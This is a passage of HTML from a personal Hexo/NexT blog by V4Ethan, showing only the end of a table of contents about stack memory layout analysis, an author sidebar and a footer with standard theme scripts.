href="#%E6%A0%88%E5%86%85%E5%AD%98%E5%B8%83%E5%B1%80%E5%88%86%E6%9E%90"><span class="nav-number">2.5.2.</span> <span class="nav-text">栈内存布局分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%AA%8C%E8%AF%81%E7%8C%9C%E6%83%B3"><span class="nav-number">2.5.3.</span> <span class="nav-text">验证猜想</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="V4Ethan"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">V4Ethan</p>
  <div class="site-description" itemprop="description">V4Ethan's Blog</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/index.html">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/V4Ethan" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;V4Ethan" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:iszhenghailin@gmail.com" title="E-Mail → mailto:iszhenghailin@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">V4Ethan</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
